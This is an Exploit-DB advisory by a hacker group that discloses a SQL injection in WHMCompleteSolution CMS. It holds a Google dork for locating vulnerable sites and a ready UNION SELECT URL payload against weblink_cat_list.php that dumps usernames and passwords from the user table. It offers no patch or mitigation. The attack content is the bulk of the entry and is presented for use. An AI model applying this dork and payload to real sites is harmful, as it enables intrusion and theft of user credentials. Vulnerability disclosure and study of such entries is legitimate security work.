WHMCompleteSolution CMS - SQL Injection

EDB-ID:

10493

CVE:

EDB Verified:

Author:

Dr.0rYX & Cr3W-DZ

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-12-16

Vulnerable App:

                                                    ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************

[!]            WHMCompleteSolution CMS sql Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.siamhostserver.com/whmcs/
[+] script   : WHMCompleteSolution CMS
[+] Download : http://www.siamhostserver.com/whmcs/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"weblink_cat_list.php?bcat_id="

**************************************************************************/
[ Vulnerable File ]

http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]

[ Exploit ]

http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user


[  GReets ]

[+] :CLAW , le0n , HIS0K4 , WWW.exploit-db.com , ALL HACKERS MUSLIMS

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services